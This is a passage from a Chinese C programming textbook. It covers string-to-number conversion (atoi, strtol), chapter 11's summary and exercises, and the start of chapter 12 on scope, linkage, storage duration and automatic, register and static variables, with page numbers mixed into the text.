和其他转换说明,把数字从数值形式转换为字符串形式, scanf()可以把输入字符串转换为数值形式。C 还有一些函数专门用于把字符 串形式转换成数值形式。 假设你编写的程序需要使用数值命令形参,但是命令形参数被读取为字 符串。因此,要使用数值必须先把字符串转换为数字。如果需要整数,可以 使用atoi()函数(用于把字母数字转换成整数),该函数接受一个字符串作 为参数,返回相应的整数值。程序清单11.32中的程序示例演示了该函数的 用法。 程序清单11.32 hello.c程序 /* hello.c -- 把命令行参数转换为数字 */ #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv []) { int i, times; if (argc < 2 || (times = atoi(argv[1])) < 1) 839 printf("Usage: %s positive-number\n", argv[0]); else for (i = 0; i < times; i++) puts("Hello, good looking!"); return 0; } 该程序的运行示例: $ hello 3 Hello, good looking! Hello, good looking! Hello, good looking! $是UNIX和Linux的提示符(一些UNIX系统使用%)。命令行参数3被储 存为字符串3\0。atoi()函数把该字符串转换为整数值3,然后该值被赋给 times。该值确定了执行for循环的次数。 如果运行该程序时没有提供命令行参数,那么argc < 2为真,程序给出 一条提示信息后结束。如果times 为 0 或负数,情况也是如此。C 语言逻辑 运算符的求值顺序保证了如果 argc < 2,就不会对atoi(argv[1])求值。 如果字符串仅以整数开头,atio()函数也能处理,它只把开头的整数转 换为字符。例如, atoi("42regular")将返回整数42。如果在命令行输入hello what会怎样?在我们所用的C实现中,如果命令行参数不是数字,atoi()函数 返回0。然而C标准规定,这种情况下的行为是未定义的。因此,使用有错 误检测功能的strtol()函数(马上介绍)会更安全。 840 该程序中包含了stdlib.h头文件,因为从ANSI C开始,该头文件中包含 了atoi()函数的原型。除此之外,还包含了 atof()和 atol()函数的原型。atof() 函数把字符串转换成 double 类型的值, atol()函数把字符串转换成long类型 的值。atof()和atol()的工作原理和atoi()类似,因此它们分别返回double类型 和long类型。 ANSI C还提供一套更智能的函数:strtol()把字符串转换成long类型的 值,strtoul()把字符串转换成unsigned long类型的值,strtod()把字符串转换成 double类型的值。这些函数的智能之处在于识别和报告字符串中的首字符是 否是数字。而且,strtol()和strtoul()还可以指定数字的进制。 下面的程序示例中涉及strtol()函数,其原型如下: long strtol(const char * restrict nptr, char ** restrict endptr, int base); 这里,nptr是指向待转换字符串的指针,endptr是一个指针的地址,该 指针被设置为标识输入数字结束字符的地址,base表示以什么进制写入数 字。程序清单11.33演示了该函数的用法。 程序清单11.33 strcnvt.c程序 /* strcnvt.c -- 使用 strtol() */ #include <stdio.h> #include <stdlib.h> #define LIM 30 char * s_gets(char * st, int n); int main() { 841 char number[LIM]; char * end; long value; puts("Enter a number (empty line to quit):"); while (s_gets(number, LIM) && number[0] != '\0') { value = strtol(number, &end, 10); /* 十进制 */ printf("base 10 input, base 10 output: %ld, stopped at %s  (%d)\n", value, end, *end); value = strtol(number, &end, 16); /* 十六进制 */ printf("base 16 input, base 10 output: %ld, stopped at %s  (%d)\n", value, end, *end); puts("Next number:"); } puts("Bye!\n"); return 0; } char * s_gets(char * st, int n) 842 { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 下面是该程序的输出示例: Enter a number (empty line to quit): 10 843 base 10 input, base 10 output: 10, stopped at (0) base 16 input, base 10 output: 16, stopped at (0) Next number: 10atom base 10 input, base 10 output: 10, stopped at atom (97) base 16 input, base 10 output: 266, stopped at tom (116) Next number: Bye! 首先注意,当base分别为10和16时,字符串"10"分别被转换成数字10和 16。还要注意,如果end指向一个字符,*end就是一个字符。因此,第1次转 换在读到空字符时结束,此时end指向空字符。打印end会显示一个空字符 串,以%d转换说明输出*end显示的是空字符的ASCII码。 对于第2个输入的字符串,当base为10时,end的值是'a'字符的地址。所 以打印end显示的是字符串"atom",打印*end显示的是'a'字符的ASCII码。然 而,当base为16时,'a'字符被识别为一个有效的十六进制数,strtol()函数把 十六进制数10a转换成十进制数266。 strtol()函数最多可以转换三十六进制,'a'~'z'字符都可用作数字。 strtoul()函数与该函数类似,但是它把字符串转换成无符号值。strtod()函数 只以十进制转换,因此它值需要两个参数。 许多实现使用 itoa()和 ftoa()函数分别把整数和浮点数转换成字符串。但 是这两个函数并不是 C标准库的成员,可以用sprintf()函数代替它们,因为 sprintf()的兼容性更好。 844 11.10 关键概念 许多程序都要处理文本数据。一个程序可能要求用户输入姓名、公司列 表、地址、一种蕨类植物的学名、音乐剧的演员等。毕竟,我们用言语与现 实世界互动,使用文本的例子不计其数。C 程序通过字符串的方式来处理它 们。 字符串,无论是由字符数组、指针还是字符串常量标识,都储存为包含 字符编码的一系列字节,并以空字符串结尾。C 提供库函数处理字符串,查 找字符串并分析它们。尤其要牢记,应该使用 strcmp()来代替关系运算符, 当比较字符串时,应该使用strcpy()或strncpy()代替赋值运算符把字符串赋给 字符数组。 845 11.11 本章小结 C字符串是一系列char类型的字符,以空字符('\0')结尾。字符串可以 储存在字符数组中。字符串还可以用字符串常量来表示,里面都是字符,括 在双引号中(空字符除外)。编译器提供空字符。因此,"joy"被储存为4个 字符j、o、y和\0。strlen()函数可以统计字符串的长度,空字符不计算在内。 字符串常量也叫作字符串——字面量,可用于初始化字符数组。为了容 纳末尾的空字符,数组大小应该至少比容纳的数组长度多1。也可以用字符 串常量初始化指向char的指针。 函数使用指向字符串首字符的指针来表示待处理的字符串。通常,对应 的实际参数是数组名、指针变量或用双引号括起来的字符串。无论是哪种情 况,传递的都是首字符的地址。一般而言,没必要传递字符串的长度,因为 函数可以通过末尾的空字符确定字符串的结束。 fgets()函数获取一行输入,puts()和 fputs()函数显示一行输出。它们都是 stdio.h 头文件中的函数,用于代替已被弃用的gets()。 C库中有多个字符串处理函数。在ANSI C中,这些函数都声明在string.h 文件中。C库中还有许多字符处理函数,声明在ctype.h文件中。 给main()函数提供两个合适的形式参数,可以让程序访问命令行参数。 第1个参数通常是int类型的argc,其值是命令行的单词数量。第2个参数通常 是一个指向数组的指针argv,数组内含指向char的指针。每个指向char的指 针都指向一个命令行参数字符串,argv[0]指向命令名称,argv[1]指向第1个 命令行参数,以此类推。 atoi()、atol()和atof()函数把字符串形式的数字分别转换成int、long 和 double类型的数字。strtol()、strtoul()和strtod()函数把字符串形式的数字分别 转换成long、unsigned long和double类型的数字。 846 11.12 复习题 复习题的参考答案在附录A中。 1.下面字符串的声明有什么问题? int main(void) { char name[] = {'F', 'e', 's', 's' }; ... } 2.下面的程序会打印什么? #include <stdio.h> int main(void) { char note[] = "See you at the snack bar."; char *ptr; ptr = note; puts(ptr); puts(++ptr); note[7] = '\0'; puts(note); 847 puts(++ptr); return 0; } 3.下面的程序会打印什么? #include <stdio.h> #include <string.h> int main(void) { char food [] = "Yummy"; char *ptr; ptr = food + strlen(food); while (--ptr >= food) puts(ptr); return 0; } 4.下面的程序会打印什么? #include <stdio.h> #include <string.h> int main(void) 848 { char goldwyn[40] = "art of it all "; char samuel[40] = "I read p"; const char * quote = "the way through."; strcat(goldwyn, quote); strcat(samuel, goldwyn); puts(samuel); return 0; } 5.下面的练习涉及字符串、循环、指针和递增指针。首先,假设定义了 下面的函数: #include <stdio.h> char *pr(char *str) { char *pc; pc = str; while (*pc) putchar(*pc++); do { 849 putchar(*--pc); } while (pc - str); return (pc); } 考虑下面的函数调用: x = pr("Ho Ho Ho!"); a.将打印什么? b.x是什么类型? c.x的值是什么? d.表达式*--pc是什么意思?与--*pc有何不同? e.如果用*--pc替换--*pc,会打印什么? f.两个while循环用来测试什么? g.如果pr()函数的参数是空字符串,会怎样? h.必须在主调函数中做什么,才能让pr()函数正常运行? 6.假设有如下声明: char sign = '$'; sign占用多少字节的内存?'$'占用多少字节的内存?"$"占用多少字节的 内存? 7.下面的程序会打印出什么? 850 #include <stdio.h> #include <string.h> #define M1 "How are ya, sweetie? " char M2[40] = "Beat the clock."; char * M3 = "chat"; int main(void) { char words[80]; printf(M1); puts(M1); puts(M2); puts(M2 + 1); strcpy(words, M2); strcat(words, " Win a toy."); puts(words); words[4] = '\0'; puts(words); while (*M3) puts(M3++); 851 puts(--M3); puts(--M3); M3 = M1; puts(M3); return 0; } 8.下面的程序会打印出什么? #include <stdio.h> int main(void) { char str1 [] = "gawsie"; char str2 [] = "bletonism"; char *ps; int i = 0; for (ps = str1; *ps != '\0'; ps++) { if (*ps == 'a' || *ps == 'e') putchar(*ps); else (*ps)--; 852 putchar(*ps); } putchar('\n'); while (str2[i] != '\0') { printf("%c", i % 3 ? str2[i] : '*'); ++i; } return 0; } 9.本章定义的s_gets()函数,用指针表示法代替数组表示法便可减少一个 变量i。请改写该函数。 10.strlen()函数接受一个指向字符串的指针作为参数,并返回该字符串 的长度。请编写一个这样的函数。 11.本章定义的s_gets()函数,可以用strchr()函数代替其中的while循环来 查找换行符。请改写该函数。 12.设计一个函数,接受一个指向字符串的指针,返回指向该字符串第1 个空格字符的指针,或如果未找到空格字符,则返回空指针。 13.重写程序清单11.21,使用ctype.h头文件中的函数,以便无论用户选 择大写还是小写,该程序都能正确识别答案。 853 11.13 编程练习 1.设计并测试一个函数,从输入中获取下n个字符(包括空白、制表 符、换行符),把结果储存在一个数组里,它的地址被传递作为一个参数。 2.修改并编程练习1的函数,在n个字符后停止,或在读到第1个空白、 制表符或换行符时停止,哪个先遇到哪个停止。不能只使用scanf()。 3.设计并测试一个函数,从一行输入中把一个单词读入一个数组中,并 丢弃输入行中的其余字符。该函数应该跳过第1个非空白字符前面的所有空 白。将一个单词定义为没有空白、制表符或换行符的字符序列。 4.设计并测试一个函数,它类似编程练习3的描述,只不过它接受第2个 参数指明可读取的最大字符数。 5.设计并测试一个函数,搜索第1个函数形参指定的字符串,在其中查 找第2个函数形参指定的字符首次出现的位置。如果成功,该函数返指向该 字符的指针,如果在字符串中未找到指定字符,则返回空指针(该函数的功 能与 strchr()函数相同)。在一个完整的程序中测试该函数,使用一个循环 给函数提供输入值。 6.编写一个名为is_within()的函数,接受一个字符和一个指向字符串的 指针作为两个函数形参。如果指定字符在字符串中,该函数返回一个非零值 (即为真)。否则,返回0(即为假)。在一个完整的程序中测试该函数, 使用一个循环给函数提供输入值。 7.strncpy(s1, s2, n)函数把s2中的n个字符拷贝至s1中,截断s2,或者有必 要的话在末尾添加空字符。如果s2的长度是n或多于n,目标字符串不能以空 字符结尾。该函数返回s1。自己编写一个这样的函数,名为mystrncpy()。在 一个完整的程序中测试该函数,使用一个循环给函数提供输入值。 8.编写一个名为string_in()的函数,接受两个指向字符串的指针作为参 数。如果第2个字符串中包含第1个字符串,该函数将返回第1个字符串开始 854 的地址。例如,string_in("hats", "at")将返回hats中a的地址。否则,该函数返 回空指针。在一个完整的程序中测试该函数,使用一个循环给函数提供输入 值。 9.编写一个函数,把字符串中的内容用其反序字符串代替。在一个完整 的程序中测试该函数,使用一个循环给函数提供输入值。 10.编写一个函数接受一个字符串作为参数,并删除字符串中的空格。 在一个程序中测试该函数,使用循环读取输入行,直到用户输入一行空行。 该程序应该应用该函数只每个输入的字符串,并显示处理后的字符串。 11.编写一个函数,读入10个字符串或者读到EOF时停止。该程序为用 户提供一个有5个选项的菜单:打印源字符串列表、以ASCII中的顺序打印字 符串、按长度递增顺序打印字符串、按字符串中第1个单词的长度打印字符 串、退出。菜单可以循环显示,除非用户选择退出选项。当然,该程序要能 真正完成菜单中各选项的功能。 12.编写一个程序,读取输入,直至读到 EOF,报告读入的单词数、大 写字母数、小写字母数、标点符号数和数字字符数。使用ctype.h头文件中的 函数。 13.编写一个程序,反序显示命令行参数的单词。例如,命令行参数是 see you later,该程序应打印later you see。 14.编写一个通过命令行运行的程序计算幂。第1个命令行参数是double 类型的数,作为幂的底数,第2个参数是整数,作为幂的指数。 15.使用字符分类函数实现atoi()函数。如果输入的字符串不是纯数字, 该函数返回0。 16.编写一个程序读取输入,直至读到文件结尾,然后把字符串打印出 来。该程序识别和实现下面的命令行参数: -p     按原样打印 855 -u     把输入全部转换成大写 -l     把输入全部转换成小写 如果没有命令行参数,则让程序像是使用了-p参数那样运行。 856 第12章 存储类别、链接和内存管理 本章介绍以下内容: 关键字:auto、extern、static、register、const、volatile、restricted、 _Thread_local、_Atomic 函数:rand()、srand()、time()、malloc()、calloc()、free() 如何确定变量的作用域(可见的范围)和生命期(它存在多长时间) 设计更复杂的程序 C语言能让程序员恰到好处地控制程序,这是它的优势之一。程序员通 过 C的内存管理系统指定变量的作用域和生命期,实现对程序的控制。合理 使用内存储存数据是设计程序的一个要点。 857 12.1 存储类别 C提供了多种不同的模型或存储类别(storage class)在内存中储存数 据。要理解这些存储类别,先要复习一些概念和术语。 本书目前所有编程示例中使用的数据都储存在内存中。从硬件方面来 看,被储存的每个值都占用一定的物理内存,C 语言把这样的一块内存称为 对象(object)。对象可以储存一个或多个值。一个对象可能并未储存实际 的值,但是它在储存适当的值时一定具有相应的大小(面向对象编程中的对 象指的是类对象,其定义包括数据和允许对数据进行的操作,C不是面向对 象编程语言)。 从软件方面来看,程序需要一种方法访问对象。这可以通过声明变量来 完成: int entity = 3; 该声明创建了一个名为entity的标识符(identifier)。标识符是一个名 称,在这种情况下,标识符可以用来指定(designate)特定对象的内容。标 识符遵循变量的命名规则(第2章介绍过)。在该例中,标识符entity即是软 件(即C程序)指定硬件内存中的对象的方式。该声明还提供了储存在对象 中的值。 变量名不是指定对象的唯一途径。考虑下面的声明: int * pt = &entity; int ranks[10]; 第1行声明中,pt是一个标识符,它指定了一个储存地址的对象。但 是,表达式*pt不是标识符,因为它不是一个名称。然而,它确实指定了一 个对象,在这种情况下,它与 entity 指定的对象相同。一般而言,那些指定 对象的表达式被称为左值(第5章介绍过)。所以,entity既是标识符也是左 858 值;*pt既是表达式也是左值。按照这个思路,ranks + 2 * entity既不是标识符 (不是名称),也不是左值(它不指定内存位置上的内容)。但是表达式* (ranks + 2 * entity)是一个左值,因为它的确指定了特定内存位置的值,即 ranks数组的第7个元素。顺带一提,ranks的声明创建了一个可容纳10个int类 型元素的对象,该数组的每个元素也是一个对象。 所有这些示例中,如果可以使用左值改变对象中的值,该左值就是一个 可修改的左值(modifiable lvalue)。现在,考虑下面的声明: const char * pc = "Behold a string literal!"; 程序根据该声明把相应的字符串字面量储存在内存中,内含这些字符值 的数组就是一个对象。由于数组中的每个字符都能被单独访问,所以每个字 符也是一个对象。该声明还创建了一个标识符为pc的对象,储存着字符串的 地址。由于可以设置pc重新指向其他字符串,所以标识符pc是一个可修改的 左值。const只能保证被pc指向的字符串内容不被修改,但是无法保证pc不指 向别的字符串。由于*pc指定了储存'B'字符的数据对象,所以*pc 是一个左 值,但不是一个可修改的左值。与此类似,因为字符串字面量本身指定了储 存字符串的对象,所以它也是一个左值,但不是可修改的左值。 可以用存储期(storage duration)描述对象,所谓存储期是指对象在内 存中保留了多长时间。标识符用于访问对象,可以用作用域(scope)和链 接(linkage)描述标识符,标识符的作用域和链接表明了程序的哪些部分可 以使用它。不同的存储类别具有不同的存储期、作用域和链接。标识符可以 在源代码的多文件中共享、可用于特定文件的任意函数中、可仅限于特定函 数中使用,甚至只在函数中的某部分使用。对象可存在于程序的执行期,也 可以仅存在于它所在函数的执行期。对于并发编程,对象可以在特定线程的 执行期存在。可以通过函数调用的方式显式分配和释放内存。 我们先学习作用域、链接和存储期的含义,再介绍具体的存储类别。 12.1.1 作用域 859 作用域描述程序中可访问标识符的区域。一个C变量的作用域可以是块 作用域、函数作用域、函数原型作用域或文件作用域。到目前为止,本书程 序示例中使用的变量几乎都具有块作用域。块是用一对花括号括起来的代码 区域。例如,整个函数体是一个块,函数中的任意复合语句也是一个块。定 义在块中的变量具有块作用域(block scope),块作用域变量的可见范围是 从定义处到包含该定义的块的末尾。另外,虽然函数的形式参数声明在函数 的左花括号之前,但是它们也具有块作用域,属于函数体这个块。所以到目 前为止,我们使用的局部变量(包括函数的形式参数)都具有块作用域。因 此,下面代码中的变量 cleo和patrick都具有块作用域: double blocky(double cleo) { double patrick = 0.0; ... return patrick; } 声明在内层块中的变量,其作用域仅局限于该声明所在的块: double blocky(double cleo) { double patrick = 0.0; int i; for (i = 0; i < 10; i++) { 860 double q = cleo * i; // q的作用域开始 ... patrick *= q; }                // q的作用域结束 ... return patrick; } 在该例中,q的作用域仅限于内层块,只有内层块中的代码才能访问q。 以前,具有块作用域的变量都必须声明在块的开头。C99 标准放宽了这 一限制,允许在块中的任意位置声明变量。因此,对于for的循环头,现在 可以这样写: for (int i = 0; i < 10; i++) printf("A C99 feature: i = %d", i); 为适应这个新特性,C99把块的概念扩展到包括for循环、while循环、 do while循环和if语句所控制的代码,即使这些代码没有用花括号括起来, 也算是块的一部分。所以,上面for循环中的变量i被视为for循环块的一部 分,它的作用域仅限于for循环。一旦程序离开for循环,就不能再访问i。 函数作用域(function scope)仅用于goto语句的标签。这意味着即使一 个标签首次出现在函数的内层块中,它的作用域也延伸至整个函数。如果在 两个块中使用相同的标签会很混乱,标签的函数作用域防止了这样的事情发 生。 函数原型作用域(function prototype scope)用于函数原型中的形参名 861 (变量名),如下所示: int mighty(int mouse, double large); 函数原型作用域的范围是从形参定义处到原型声明结束。这意味着,编 译器在处理函数原型中的形参时只关心它的类型,而形参名(如果有的话) 通常无关紧要。而且,即使有形参名,也不必与函数定义中的形参名相匹 配。只有在变长数组中,形参名才有用: void use_a_VLA(int n, int m, ar[n][m]); 方括号中必须使用在函数原型中已声明的名称。 变量的定义在函数的外面,具有文件作用域(file scope)。具有文件作 用域的变量,从它的定义处到该定义所在文件的末尾均可见。考虑下面的例 子: #include <stdio.h> int units = 0;    /* 该变量具有文件作用域 */ void critic(void); int main(void) { ... } void critic(void) { ... 862 } 这里,变量units具有文件作用域,main()和critic()函数都可以使用它 (更准确地说,units具有外部链接文件作用域,稍后讲解)。由于这样的变 量可用于多个函数,所以文件作用域变量也称为全局变量(global variable)。 注意 翻译单元和文件 你认为的多个文件在编译器中可能以一个文件出现。例如,通常在源代 码(.c扩展名)中包含一个或多个头文件(.h 扩展名)。头文件会依次包含 其他头文件,所以会包含多个单独的物理文件。但是,C预处理实际上是用 包含的头文件内容替换#include指令。所以,编译器源代码文件和所有的头 文件都看成是一个包含信息的单独文件。这个文件被称为翻译单元 (translation unit)。描述一个具有文件作用域的变量时,它的实际可见范围 是整个翻译单元。如果程序由多个源代码文件组成,那么该程序也将由多个 翻译单元组成。每个翻译单元均对应一个源代码文件和它所包含的文件。 12.1.2 链接 接下来,我们介绍链接。C 变量有 3 种链接属性:外部链接、内部链接 或无链接。具有块作用域、函数作用域或函数原型作用域的变量都是无链接 变量。这意味着这些变量属于定义它们的块、函数或原型私有。具有文件作 用域的变量可以是外部链接或内部链接。外部链接变量可以在多文件程序中 使用,内部链接变量只能在一个翻译单元中使用。 注意 正式和非正式术语 C 标准用“内部链接的文件作用域”描述仅限于一个翻译单元(即一个源 代码文件和它所包含的头文件)的作用域,用“外部链接的文件作用域”描述 可延伸至其他翻译单元的作用域。但是,对程序员而言这些术语太长了。一 些程序员把“内部链接的文件作用域”简称为“文件作用域”,把“外部链接的 文件作用域”简称为“全局作用域”或“程序作用域”。 863 如何知道文件作用域变量是内部链接还是外部链接?可以查看外部定义 中是否使用了存储类别说明符static: int giants = 5;       // 文件作用域,外部链接 static int dodgers = 3;   // 文件作用域,内部链接 int main() { ... } ... 该文件和同一程序的其他文件都可以使用变量giants。而变量dodgers属 文件私有,该文件中的任意函数都可使用它。 12.1.3 存储期 作用域和链接描述了标识符的可见性。存储期描述了通过这些标识符访 问的对象的生存期。C对象有4种存储期:静态存储期、线程存储期、自动 存储期、动态分配存储期。 如果对象具有静态存储期,那么它在程序的执行期间一直存在。文件作 用域变量具有静态存储期。注意,对于文件作用域变量,关键字 static表明 了其链接属性,而非存储期。以 static声明的文件作用域变量具有内部链 接。但是无论是内部链接还是外部链接,所有的文件作用域变量都具有静态 存储期。 线程存储期用于并发程序设计,程序执行可被分为多个线程。具有线程 存储期的对象,从被声明时到线程结束一直存在。以关键字_Thread_local声 明一个对象时,每个线程都获得该变量的私有备份。 864 块作用域的变量通常都具有自动存储期。当程序进入定义这些变量的块 时,为这些变量分配内存;当退出这个块时,释放刚才为变量分配的内存。 这种做法相当于把自动变量占用的内存视为一个可重复使用的工作区或暂存 区。例如,一个函数调用结束后,其变量占用的内存可用于储存下一个被调 用函数的变量。 变长数组稍有不同,它们的存储期从声明处到块的末尾,而不是从块的 开始处到块的末尾。 我们到目前为止使用的局部变量都是自动类别。例如,在下面的代码 中,变量number和index在每次调用bore()函数时被创建,在离开函数时被销 毁: void bore(int number) { int index; for (index = 0; index < number; index++) puts("They don't make them the way they used to.\n"); return 0; } 然而,块作用域变量也能具有静态存储期。为了创建这样的变量,要把 变量声明在块中,且在声明前面加上关键字static: void more(int number) { int index; 865 static int ct = 0; ... return 0; } 这里,变量ct储存在静态内存中,它从程序被载入到程序结束期间都存 在。但是,它的作用域定义在more()函数块中。只有在执行该函数时,程序 才能使用ct访问它所指定的对象(但是,该函数可以给其他函数提供该存储 区的地址以便间接访问该对象,例如通过指针形参或返回值)。 C 使用作用域、链接和存储期为变量定义了多种存储方案。本书不涉及 并发程序设计,所以不再赘述这方面的内容。已分配存储期在本章后面介 绍。因此,剩下5种存储类别:自动、寄存器、静态块作用域、静态外部链 接、静态内部链接,如表12.1所列。现在,我们已经介绍了作用域、链接和 存储期,接下来将详细讨论这些存储类别。 表12.1 5种存储类别 12.1.4 自动变量 属于自动存储类别的变量具有自动存储期、块作用域且无链接。默认情 况下,声明在块或函数头中的任何变量都属于自动存储类别。为了更清楚地 表达你的意图(例如,为了表明有意覆盖一个外部变量定义,或者强调不要 把该变量改为其他存储类别),可以显式使用关键字auto,如下所示: int main(void) 866 { auto int plox; 关键字auto是存储类别说明符(storage-class specifier)。auto关键字在 C++中的用法完全不同,如果编写C/C++兼容的程序,最好不要使用auto作 为存储类别说明符。 块作用域和无链接意味着只有在变量定义所在的块中才能通过变量名访 问该变量(当然,参数用于传递变量的值和地址给另一个函数,但是这是间 接的方法)。另一个函数可以使用同名变量,但是该变量是储存在不同内存 位置上的另一个变量。 变量具有自动存储期意味着,程序在进入该变量声明所在的块时变量存 在,程序在退出该块时变量消失。原来该变量占用的内存位置现在可做他 用。 接下来分析一下嵌套块的情况。块中声明的变量仅限于该块及其包含的 块使用。 int loop(int n) { int m; // m 的作用域 scanf("%d", &m); { int i; // m 和 i 的作用域 for (i = m; i < n; i++) puts("i is local to a sub-block\n"); 867 } return m; // m 的作用域,i 已经消失 } 在上面的代码中,i仅在内层块中可见。如果在内层块的前面或后面使 用i,编译器会报错。通常,在设计程序时用不到这个特性。然而,如果这 个变量仅供该块使用,那么在块中就近定义该变量也很方便。这样,可以在 靠近使用变量的地方记录其含义。另外,这样的变量只有在使用时才占用内 存。变量n和 m 分别定义在函数头和外层块中,它们的作用域是整个函数, 而且在调用函数到函数结束期间都一直存在。 如果内层块中声明的变量与外层块中的变量同名会怎样?内层块会隐藏 外层块的定义。但是离开内层块后,外层块变量的作用域又回到了原来的作 用域。程序清单12.1演示了这一过程。 程序清单12.1 hiding.c程序 // hiding.c -- 块中的变量 #include <stdio.h> int main() { int x = 30;       // 原始的 x printf("x in outer block: %d at %p\n", x, &x); { int x = 77;     // 新的 x,隐藏了原始的 x printf("x in inner block: %d at %p\n", x, &x); 868 } printf("x in outer block: %d at %p\n", x, &x); while (x++ < 33)    // 原始的 x { int x = 100;    // 新的 x,隐藏了原始的 x x++; printf("x in while loop: %d at %p\n", x, &x); } printf("x in outer block: %d at %p\n", x, &x); return 0; } 下面是该程序的输出: x in outer block: 30 at 0x7fff5fbff8c8 x in inner block: 77 at 0x7fff5fbff8c4 x in outer block: 30 at 0x7fff5fbff8c8 x in while loop: 101 at 0x7fff5fbff8c0 x in while loop: 101 at 0x7fff5fbff8c0 x in while loop: 101 at 0x7fff5fbff8c0 x in outer block: 34 at 0x7fff5fbff8c8 869 首先,程序创建了变量x并初始化为30,如第1条printf()语句所示。然 后,定义了一个新的变量x,并设置为77,如第2条printf()语句所示。根据显 示的地址可知,新变量隐藏了原始的x。第3条printf()语句位于第1个内层块 后面,显示的是原始的x的值,这说明原始的x既没有消失也不曾改变。 也许该程序最难懂的是while循环。while循环的测试条件中使用的是原 始的x: while(x++ < 33) 在该循环中,程序创建了第3个x变量,该变量只定义在while循环中。 所以,当执行到循环体中的x++时,递增为101的是新的x,然后printf()语句 显示了该值。每轮迭代结束,新的x变量就消失。然后循环的测试条件使用 并递增原始的x,再次进入循环体,再次创建新的x。在该例中,这个x被创 建和销毁了3次。注意,该循环必须在测试条件中递增x,因为如果在循环体 中递增x,那么递增的是循环体中创建的x,而非测试条件中使用的原始x。 我们使用的编译器在创建while循环体中的x时,并未复用内层块中x占 用的内存,但是有些编译器会这样做。 该程序示例的用意不是鼓励读者要编写类似的代码(根据C的命名规 则,要想出别的变量名并不难),而是为了解释在内层块中定义变量的具体 情况。 1.没有花括号的块 前面提到一个C99特性:作为循环或if语句的一部分,即使不使用花括 号({}),也是一个块。更完整地说,整个循环是它所在块的子块(sub- block),循环体是整个循环块的子块。与此类似,if 语句是一个块,与其 相关联的子语句是if语句的子块。这些规则会影响到声明的变量和这些变量 的作用域。程序清单12.2演示了for循环中该特性的用法。 程序清单12.2 forc99.c程序 870 // forc99.c -- 新的 C99 块规则 #include <stdio.h> int main() { int n = 8; printf("  Initially, n = %d at %p\n", n, &n); for (int n = 1; n < 3; n++) printf("    loop 1: n = %d at %p\n", n, &n); printf("After loop 1, n = %d at %p\n", n, &n); for (int n = 1; n < 3; n++) { printf(" loop 2 index n = %d at %p\n", n, &n); int n = 6; printf("    loop 2: n = %d at %p\n", n, &n); n++; } printf("After loop 2, n = %d at %p\n", n, &n); return 0; } 871 假设编译器支持C语言的这个新特性,该程序的输出如下: Initially, n = 8 at 0x7fff5fbff8c8 loop 1: n = 1 at 0x7fff5fbff8c4 loop 1: n = 2 at 0x7fff5fbff8c4 After loop 1, n = 8 at 0x7fff5fbff8c8 loop 2 index n = 1 at 0x7fff5fbff8c0 loop 2: n = 6 at 0x7fff5fbff8bc loop 2 index n = 2 at 0x7fff5fbff8c0 loop 2: n = 6 at 0x7fff5fbff8bc After loop 2, n = 8 at 0x7fff5fbff8c8 第1个for循环头中声明的n,其作用域作用至循环末尾,而且隐藏了原 始的n。但是,离开循环后,原始的n又起作用了。 第2个for循环头中声明的n作为循环的索引,隐藏了原始的n。然后,在 循环体中又声明了一个n,隐藏了索引n。结束一轮迭代后,声明在循环体中 的n消失,循环头使用索引n进行测试。当整个循环结束时,原始的 n 又起作 用了。再次提醒读者注意,没必要在程序中使用相同的变量名。如果用了, 各变量的情况如上所述。 注意 支持C99和C11 有些编译器并不支持C99/C11的这些作用域规则(Microsoft Visual Studio 2012就是其中之一)。有些编译会提供激活这些规则的选项。例如,撰写本 书时,gcc默认支持了C99的许多特性,但是要用 选项激活程序 清单12.2中使用的特性: 872 gcc –std=c99 forc99.c 与此类似,gcc或clang都要使用 或 选项,才支持 C11特性。 2.自动变量的初始化 自动变量不会初始化,除非显式初始化它。考虑下面的声明: int main(void) { int repid; int tents = 5; tents变量被初始化为5,但是repid变量的值是之前占用分配给repid的空 间中的任意值(如果有的话),别指望这个值是0。可以用非常量表达式 (non-constant expression)初始化自动变量,前提是所用的变量已在前面定 义过: int main(void) { int ruth = 1; int rance = 5 * ruth; // 使用之前定义的变量 12.1.5 寄存器变量 变量通常储存在计算机内存中。如果幸运的话,寄存器变量储存在CPU 的寄存器中,或者概括地说,储存在最快的可用内存中。与普通变量相比, 访问和处理这些变量的速度更快。由于寄存器变量储存在寄存器而非内存 中,所以无法获取寄存器变量的地址。绝大多数方面,寄存器变量和自动变 873 量都一样。也就是说,它们都是块作用域、无链接和自动存储期。使用存储 类别说明符register便可声明寄存器变量: int main(void) { register int quick; 我们刚才说“如果幸运的话”,是因为声明变量为register类别与直接命令 相比更像是一种请求。编译器必须根据寄存器或最快可用内存的数量衡量你 的请求,或者直接忽略你的请求,所以可能不会如你所愿。在这种情况下, 寄存器变量就变成普通的自动变量。即使是这样,仍然不能对该变量使用地 址运算符。 在函数头中使用关键字register,便可请求形参是寄存器变量: void macho(register int n) 可声明为register的数据类型有限。例如,处理器中的寄存器可能没有足 够大的空间来储存double类型的值。 12.1.6 块作用域的静态变量 静态变量(static variable)听起来自相矛盾,像是一个不可变的变量。 实际上,静态的意思是该变量在内存中原地不动,并不是说它的值不变。具 有文件作用域的变量自动具有(也必须是)静态存储期。前面提到过,可以 创建具有静态存储期、块作用域的局部变量。这些变量和自动变量一样,具 有相同的作用域,但是程序离开它们所在的函数后,这些变量不会消失。也 就是说,这种变量具有块作用域、无链接,但是具有静态存储期。计算机在 多次函数调用之间会记录它们的值。在块中(提供块作用域和无链接)以存 储类别说明符static(提供静态存储期)声明这种变量。程序清单12.3演示了 一个这样的例子。 874 程序清单12.3 loc_stat.c程序 /* loc_stat.c -- 使用局部静态变量 */ #include <stdio.h> void trystat(void); int main(void) { int count; for (count = 1; count <= 3; count++) { printf("Here comes iteration %d:\n", count); trystat(); } return 0; } void trystat(void) { int fade = 1; static int stay = 1; printf("fade = %d and stay = %d\n", fade++, stay++); 875 } 注意,trystat()函数先打印再递增变量的值。该程序的输出如下: Here comes iteration 1: fade = 1 and stay = 1 Here comes iteration 2: fade = 1 and stay = 2 Here comes iteration 3: fade = 1 and stay = 3 静态变量stay保存了它被递增1后的值,但是fade变量每次都是1。这表 明了初始化的不同:每次调用trystat()都会初始化fade,但是stay只在编译 strstat()时被初始化一次。如果未显式初始化静态变量,它们会被初始化为 0。 下面两个声明很相似: int fade = 1; static int stay = 1; 第1条声明确实是trystat()函数的一部分,每次调用该函数时都会执行这 